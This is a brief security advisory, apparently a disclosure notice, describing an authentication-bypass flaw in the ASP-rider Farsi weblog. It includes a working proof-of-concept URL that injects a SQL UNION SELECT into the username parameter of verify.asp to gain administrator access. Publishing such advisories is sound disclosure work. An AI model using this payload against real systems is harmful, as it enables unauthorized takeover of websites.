|
Brought to you by:
Suppliers of:
|
|
|
| |
asp-rider is "a full farsi weblog written in ASP".
A vulnerability in the way ASP-rider parses user provided data allows a remote attacker to bypass the product's authentication mechanism and gain administrative privileges to the product. |
| |
Credit:
The information has been provided by Shervin Khaleghjou.
|
| |
Proof of concept:
The following URL will illustrate how you can easily log in to the weblog administrator page by entering the following URL:
http://vulnerable/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
|
|
|
|
|